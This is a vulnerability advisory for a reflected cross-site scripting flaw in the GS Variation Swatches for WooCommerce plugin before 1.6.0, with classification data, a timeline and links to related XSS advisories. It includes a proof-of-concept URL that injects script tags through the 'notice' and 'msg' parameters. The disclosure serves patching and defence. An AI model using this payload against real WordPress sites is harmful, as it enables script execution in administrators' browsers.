GS Variation Swatches for WooCommerce < 1.6.0 – Reflected Cross-Site Scripting

Description

The plugin does not escape the notice and msg parameter before outputting them back in the plugin's settings page, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=gs-variation-setting&notice="><script>alert(/XSS-notice/)</script>&msg=<script>alert(/XSS-msg/)</script>

Affects Plugins

gs-woo-variation-swatches

Fixed in 1.6.0

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

d7909c31-e052-4bc8-aa05-038361acae16

Timeline

Publicly Published

2022-03-22 (about 3 years ago)

Added

2022-03-22 (about 3 years ago)

Last Updated

2022-03-22 (about 3 years ago)

Other

Published

Title

Published

2024-06-20

Title

My Favorites <= 1.4.3 - Contributor+ Stored XSS

Published

2025-04-01

Title

Breaking News WP <= 1.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2021-04-13

Title

Ultimate Addons for Elementor < 1.30.0 - Contributor+ Stored XSS

Published

2022-09-05

Title

Ldap WP Login / Active Directory Integration < 3.0.2 - Reflected Cross-Site Scripting

Published

2024-12-14

Title

Utech World Time <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting